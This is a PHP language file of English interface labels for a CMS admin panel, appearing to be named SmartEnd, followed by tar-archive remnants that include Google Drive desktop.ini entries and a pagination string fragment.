'save' => 'Save', 'saveOrder' => 'Save Order', 'edit' => 'Edit', 'delete' => 'Delete', 'undoDelete' => 'Undo Delete', 'cancel' => 'Cancel', 'apply' => 'Apply', 'active' => 'Active', 'notActive' => 'Not Active', 'status' => 'Status', 'visits' => 'Visits', 'contents' => 'Contents', 'options' => 'Options', 'showing' => 'Showing', 'bulkAction' => 'Bulk action', 'activeSelected' => 'Active selected', 'blockSelected' => 'Block selected', 'deleteSelected' => 'Delete selected', 'of' => 'of', 'records' => 'records', 'confirmation' => 'Confirmation', 'yes' => 'Yes', 'no' => 'No', 'confirmationDeleteMsg' => 'Are you sure you want to delete?', 'sectionsOf' => 'Categories of ', 'comments' => 'Comments', 'videoTypes' => 'Extensions: .mp4, .ogv, .webm', 'imagesTypes' => 'Extensions: .png, .jpg, .jpeg, .gif', 'audioTypes' => 'Extensions: .mp3, .wav', 'attachTypes' => 'Extensions: (* ALL)', 'addDone' => 'New record has been Added successfully', 'saveDone' => 'Modifications you have made saved successfully', 'deleteDone' => 'Data was deleted successfully', 'erorr' => 'There is an error, please try again', 'noData' => 'There is no data here up to now', 'appsSettings' => 'Active Apps', 'fieldsSettings' => 'Fields Settings', 'frontSettings' => 'Frontend Settings', 'arabicLanguageFields' => 'Arabic language fields', 'englishLanguageFields' => 'English language fields', 'seoTab' => 'SEO Tab', 'seoTabTitle' => 'SEO Settings', 'defaultCurrency' => 'Default currency', 'commentsStatus' => 'Comments Status', 'automaticPublish' => 'Automatic Publish', 'manualByAdmin' => 'Manual By Admin', 'headerMenu' => 'Header Menu', 'footerMenu' => 'Footer Menu', 'homeSlideBanners' => 'Home Page Slide Show Banners', 'homeTextBanners' => 'Home Page Text Banners', 'sideBanners' => 'Side Banners', 'none' => 'None', 'newsletterGroup' => 'Newsletter Emails Group (within contacts)', 'homeRow1' => 'Home Page Contents ROW 1', 'homeRow2' => 'Home Page Contents ROW 2', 'homeRow3' => 'Latest Topic (within footer)', 'contactPageId' => 'Contact Us Page (Details & Maps)', 'activeLanguages' => 'Active Languages', 'activeLanguages1' => 'One Language ( Default in .env )', 'activeLanguages2' => 'All Languages', 'homeBanners' => 'Home Banners', 'textBanners' => 'Text Banners', 'sectionName' => 'Section title', 'sectionType' => 'Section type', 'sectionNew' => 'New section', 'sectionEdit' => 'Edit section', 'sectionIcon' => 'Icon', 'sectionFather' => 'Father Section', 'sectionNoFather' => 'Father Section', 'size' => 'Size', 'width' => 'Width', 'height' => 'Height', 'descriptionBox' => 'Box for description', 'linkBox' => 'Box for URL', 'sectionTypeCode' => 'Code / Text', 'sectionTypePhoto' => 'Photo', 'sectionTypeVideo' => 'Video', 'langVar' => 'Language Variable', 'sitePages' => 'Site pages', 'photos' => 'Photos', 'blog' => 'Blog', 'services' => 'Services', 'news' => 'News', 'videos' => 'Videos', 'sounds' => 'Audio', 'products' => 'Products', 'typeTextPages' => 'General', 'typePhotos' => 'Photos', 'typeVideos' => 'Videos', 'typeSounds' => 'Audio', 'hasCategories' => 'Categories', 'reviewsAvailable' => 'Comments Available', 'dateField' => 'Date Field', 'longTextField' => 'Long Text Field', 'allowEditor' => 'Allow Editor', 'attachFileField' => 'Attach File Field', 'additionalImages' => 'Additional Images', 'attachGoogleMaps' => 'Attach Google Maps', 'attachOrderForm' => 'Attach Order Form', 'withoutCategories' => 'Without Categories', 'mainCategoriesOnly' => 'Main categories only', 'mainAndSubCategories' => 'Main and sub categories', 'sectionIconPicker' => 'Section Icon (Picker)', 'topicsIconPicker' => 'Topics Icon (Picker)', 'iconPicker' => 'Icon (Picker)', 'siteInfoSettings' => 'Website Info', 'siteStatusSettings' => 'Website Status', 'siteSocialSettings' => 'Social Links', 'siteContactsSettings' => 'Contacts', 'websiteTitle' => 'Website Title', 'metaDescription' => 'Meta Description', 'metaKeywords' => 'Meta Keywords', 'websiteUrl' => 'Website URL', 'websiteNotificationEmail' => 'Website Notification Email', 'websiteNotificationEmail1' => 'Send me an email on new contact Messages', 'websiteNotificationEmail2' => 'Send me an email on new Comments', 'websiteNotificationEmail3' => 'Send me an email on new Orders', 'emailNotifications' => 'Email Notifications', 'contactAddress' => 'Address', 'contactPhone' => 'Phone', 'contactFax' => 'Fax', 'contactMobile' => 'Mobile', 'contactEmail' => 'Email', 'worksTime' => 'Working Time', 'siteStatusSettingsPublished' => 'Published', 'siteStatusSettingsClosed' => 'Closed', 'siteStatusSettingsMsg' => 'Close Message', 'facebook' => 'Facebook', 'twitter' => 'Twitter', 'google' => 'Google+', 'linkedin' => 'Linkedin', 'youtube' => 'Youtube', 'instagram' => 'Instagram', 'pinterest' => 'Pinterest', 'tumblr' => 'Tumblr', 'flickr' => 'Flickr', 'whatapp' => 'Whatsapp', 'styleSettings' => 'Style Settings', 'siteLogo' => 'Site Logo', 'favicon' => 'Favicon', 'appleIcon' => 'Apple Icon', 'styleColor1' => 'Style Color 1', 'styleColor2' => 'Style Color 2', 'restoreDefault' => 'Restore Default', 'layoutMode' => 'Layout Mode', 'wide' => 'Wide', 'boxed' => 'Boxed', 'backgroundStyle' => 'Background Style', 'colorBackground' => 'Color Background', 'patternsBackground' => 'Pattern Background', 'imageBackground' => 'Image Background', 'newsletterSubscribe' => 'Newsletter Subscribe', 'footerStyle' => 'Footer Style', 'footerStyleBg' => 'Footer Background', 'preLoad' => 'Preloader', 'bannerAdd' => 'Add New Banner', 'bannerEdit' => 'Edit Banner', 'bannerTitle' => 'Banner Title', 'bannerSection' => 'Section', 'bannerPhoto' => 'Photo', 'bannerDetails' => 'Details', 'bannerLinkUrl' => 'Banner URL', 'bannerVideoType' => 'Video type', 'bannerVideoType1' => 'Direct video', 'bannerVideoType2' => 'Youtube', 'bannerVideoType3' => 'Vimeo', 'bannerVideoFile' => 'Video File', 'bannerVideoUrl' => 'Youtube video URL', 'bannerVideoUrl2' => 'Vimeo video URL', 'bannerCode' => 'Banner Code', 'topicNew' => 'New ', 'topicEdit' => 'Edit ', 'topicName' => 'Title', 'topicPhoto' => 'Photo', 'topicSection' => 'Section', 'topicSelectSection' => 'Choose Section', 'topicDate' => 'Date', 'topicAudio' => 'Audio File', 'topicVideo' => 'Video File', 'topicAttach' => 'Attach File', 'topicDeletedSection' => 'No parent section', 'topicTabSection' => 'Section Details', 'topicTabDetails' => 'Topic Details', 'topicSEOTitle' => 'Page title', 'topicSEODesc' => 'Meta Description', 'topicSEOKeywords' => 'Meta Keywords', 'topicAdditionalPhotos' => 'Photos', 'topicGoogleMaps' => 'Google Maps', 'topicDropFiles' => 'Drop photos here or click to upload', 'topicDropFiles2' => 'You can upload many photos at the same time', 'topicCommentName' => 'Name', 'topicCommentEmail' => 'Email', 'topicComment' => 'Comment', 'topicNewComment' => 'New Comment', 'topicNewMap' => 'New Map', 'topicMapTitle' => 'Map Title', 'topicMapDetails' => 'Details', 'topicMapLocation' => 'Location', 'topicMapIcon' => 'Icon', 'topicMapClick' => 'Click on the location to add New Marker', 'topicMapORClick' => 'OR click here to add Manually', 'allContacts' => 'All Contacts', 'waitActivation' => 'Wait Activation', 'blockedContacts' => 'Blocked Contacts', 'newGroup' => 'New Group', 'newContacts' => 'New Contact', 'editContacts' => 'Edit Contact', 'deleteContacts' => 'Delete Contact', 'searchAllContacts' => 'Search all contacts', 'firstName' => 'First Name', 'lastName' => 'Last Name', 'companyName' => 'Company Name', 'city' => 'City', 'country' => 'Country', 'notes' => 'Notes', 'group' => 'Group', 'sendEmail' => 'Send Email', 'callNow' => 'Call Now', 'selectFile' => 'Select file', 'labels' => 'Labels', 'inbox' => 'Inbox', 'sent' => 'Sent', 'draft' => 'Draft', 'compose' => 'Compose', 'makeAsRead' => 'Make as read', 'makeAsUnread' => 'Make as unread', 'moveTo' => 'Move to ', 'replay' => 'Replay', 'forward' => 'Forward', 'sendTo' => 'To', 'sendFrom' => 'From', 'sendCc' => 'Cc', 'sendBcc' => 'Bcc', 'sendTitle' => 'Title', 'SaveToDraft' => 'Save to draft', 'send' => 'Send', 'print' => 'Print', 'AttachFiles' => 'Attach Files', 'newEvent' => 'New Event / Note', 'eventTotal' => 'Total', 'eventTitle' => 'Title', 'eventStart' => 'Event Start', 'eventEnd' => 'Event End', 'eventStart2' => 'Start', 'eventEnd2' => 'End', 'eventDetails' => 'Details', 'eventNote' => 'Note', 'eventMeeting' => 'Meeting', 'eventEvent' => 'Event', 'eventTask' => 'Task', 'eventType' => 'Type', 'eventAt' => 'At', 'eventToday' => 'Today', 'eventDay' => 'Day', 'eventWeek' => 'Week', 'eventMonth' => 'Month', 'eventDelete' => 'Delete this note/Event?', 'eventClear' => 'Delete All notes & events?', 'diagram' => 'Diagram', 'barDiagram' => 'Showing data as a bar diagram', 'visitors' => 'Visitors', 'ip' => 'IP', 'pageViews' => 'Page Views', 'today' => 'Today', 'yesterday' => 'Yesterday', 'last7Days' => 'Last 7 Days', 'last30Days' => 'Last 30 Days', 'thisMonth' => 'This Month', 'lastMonth' => 'Last Month', 'applyFrom' => 'From', 'applyTo' => 'To', 'customRange' => 'Custom Range', 'weekDays' => '"Su", "Mo", "Tu", "We", "Th", "Fr", "Sa"', 'monthsNames' => '"January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"', 'activity' => 'Activity', 'activitiesHistory' => 'Activities History', 'newUser' => 'New User', 'editUser' => 'Edit User', 'fullName' => 'Full Name', 'Permission' => 'Permission', 'Permission1' => 'Webmaster', 'Permission2' => 'Website Manager ( Full Features )', 'Permission3' => 'Limited User ( no delete )', 'Permission4' => 'Review User ( View Only )', 'personalPhoto' => 'Personal Photo', 'loginEmail' => 'Login Email', 'loginPassword' => 'Login Password', 'users' => 'Users', 'permissions' => 'Permissions', 'newPermissions' => 'New Permission', 'title' => 'Title', 'dataManagements' => 'Data Managements', 'dataManagements1' => 'His Own Data Only (for Personal Accounts)', 'dataManagements2' => 'All Users Data (for General Administration Accounts)', 'activeApps' => 'Active Apps', 'activeSiteSections' => 'Active Site Sections', 'addPermission' => 'ADD Permission', 'editPermission' => 'EDIT Permission', 'deletePermission' => 'DELETE Permission', 'viewOnly' => 'VIEW ONLY', 'editPermissions' => 'Edit Permissions', 'perAdd' => 'ADD', 'perEdit' => 'EDIT', 'perDelete' => 'DELETE', 'selectPermissionsType' => 'Select Permissions Type', 'newLink' => 'New Link', 'newMenu' => 'New Menu', 'menuTitle' => 'Menu Title', 'editSection' => 'Edit Link', 'linkType' => 'Link Type', 'linkType1' => 'Main Title', 'linkType2' => 'Direct Link', 'linkType3' => 'Main Section', 'linkType4' => 'Drop list', 'linkURL' => 'Link URL', 'linkSection' => 'Link Section', 'sectionTitle' => 'Link/Section Title', 'fatherSection' => 'Father Section', 'latestMessages' => 'Messages', 'notesEvents' => 'Notes & Events', 'latestContacts' => 'New Contacts', 'more' => 'More', 'viewMore' => 'View More', 'addNew' => 'Add New', 'reports' => 'Reports', 'reportsDetails' => 'You can view more reports', 'hi' => 'Hi', 'welcomeBack' => 'Welcome back', 'lastFor7Days' => 'Visitors for the last 7 Days', 'todayByCountry' => 'Today by country', 'browsers' => 'Browsers', 'browsersCalculated' => 'Calculated in last 7 days', 'visitorsRate' => 'Visitors Rate', 'visitorsRateToday' => 'Visitors rate over the current day', 'pages' => 'Pages', 'sections' => 'Sections', 'resultsFoundFor' => 'Results found for', 'connectEmailToConnect' => 'Connect to webmail account', 'connectEmail' => 'Email', 'connectPassword' => 'Password', 'openWebmail' => 'Open Webmail', 'themeSwitcher' => 'Theme Switcher', 'foldedAside' => 'Folded Aside', 'boxedLayout' => 'Boxed Layout', 'themes' => 'Themes', 'themes1' => 'LIGHT', 'themes2' => 'GREY', 'themes3' => 'Dark', 'themes4' => 'Black', 'language' => 'Language', 'change' => 'Change', 'sitePreview' => 'website', 'oops' => 'OOPS', 'noPermission' => 'Sorry! You don\'t have permission to view this page', 'notFound' => 'The page you are looking for can\'t be found', 'forgotPassword' => 'Forgot password?', 'signIn' => 'Sign in', 'keepMeSignedIn' => 'Keep me signed in', 'signedInToControl' => 'Sign in to CONTROL', 'control' => 'SmartEnd', 'resetPassword' => 'Reset Password', 'confirmPassword' => 'Confirm Password', 'newPassword' => 'New Password', 'yourEmail' => 'Your Email', 'sendPasswordResetLink' => 'Send Password Reset Link', 'returnTo' => 'Return Back', 'enterYourEmail' => 'Enter your email address below and we will send you instructions on how to change your password.', 'expireDateField' => 'Expire Date Field', 'expireDate' => 'Expire Date', 'expired' => 'Expired', 'additionalFiles' => 'Additional Files', 'relatedTopics' => 'Related Topics', 'relatedTopicsAdd' => 'Add Related Topics', 'relatedTopicsSelect' => 'Select Site Section To load Topics', 'customFields' => 'Additional Fields', 'customFieldsTitle' => 'Field Title', 'customFieldsType' => 'Field Type', 'customFieldsStatus' => 'Field Status', 'customFieldsNewField' => 'Add New Field', 'customFieldsEditField' => 'Field Edit', 'customFieldsRequired' => 'Required', 'customFieldsOptional' => 'Optional', 'customFieldsDefault' => 'Default Value', 'customFieldsOptions' => 'Options', 'customFieldsOptionsHelp' => 'Type every option on separate line', 'customFieldsForAllLang' => 'For All Languages', 'customFieldsType0' => 'Text Box', 'customFieldsType1' => 'Text Area', 'customFieldsType2' => 'Number', 'customFieldsType3' => 'Email Address', 'customFieldsType4' => 'Date', 'customFieldsType5' => 'Date & Time', 'customFieldsType6' => 'Select', 'customFieldsType7' => 'Multi Check', 'customFieldsType8' => 'Photo File', 'customFieldsType9' => 'Attach File', 'customFieldsType10' => 'Video File', 'customFieldsType11' => 'Youtube Video Link', 'customFieldsType12' => 'Vimeo Video Link', 'optionalFields' => 'Optional Fields', 'additionalTabs' => 'Additional Tabs', 'active_disable' => 'Active/Disable', 'friendlyURL' => 'Friendly URL', 'seoTabSettings' => 'Mange your page title, meta description, keywords and unique friendly URL. This help you to manage how this topic shows up on search engines.', 'friendlyURLinks' => 'Frontend URLs type', 'friendlyURLinks1' => 'Default URLs', 'friendlyURLinks2' => 'Search engine friendly URLs', 'registrationSettings' => 'Registration Settings', 'allowRegister' => 'Allow registration for Backend', 'permissionForNewUsers' => 'Permission group for new registration', 'createNewAccount' => 'Create a new account', 'APIStatus' => 'RESTful API status', 'APIKey' => 'API key', 'APIKeyGenerate' => 'Generate a new API key', 'APIKeyConfirm' => 'Are you sure you want to generate a new API key?', 'homeRow_3' => 'Home Page Contents ROW 3', 'partners' => 'Partners', 'HebrewLanguageFields' => 'Hebrew Language Fields', 'departments' => 'Departments', 'History' => 'History', 'attachformForm' => 'attach Form', 'form' => 'Form', 'kindergartenReg' => 'Kindergarten Registration', 'pupilName' => 'Pupil Name', 'pupilbirthday' => 'Pupil Birthday', 'pupilSex' => 'Pupil Sex', 'Gname' => 'Kindergarten', 'Hood' => 'Hood', 'kindergartenInfo' => 'Kindergarten Info', 'parentsInfo' => 'Parents Info', 'pupilRegInfo' => 'Pupil Info', 'Year' => 'Year', 'address' => 'Address', 'identification' => 'Identification', 'notificationReg' => 'The Registration succeeded. shortly you will be contacted', 'notificationSubject' => 'Kindergarten Registration', 'applicationSubmitSubject' => 'Residence Permit', 'applicationSubmitMsg' => 'Dear Citizen, your Application received successfully, it will be processed. After that will will contact you', 'applicationSubmitBackend' => 'applied for citizen Permit, please process his Application', 'getNotifications' => 'Notify by Form send', 'contacts' => 'Contacts', ); lang/en/desktop.ini000064400000000216147565226310010253 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 lang/en/pagination.php000064400000001026147565226310010743 0ustar00 '« Previous', 'next' => 'Next »', ]; lang/desktop.ini000064400000000216147565226310007651 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 desktop.ini000064400000000216147565226310006730 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16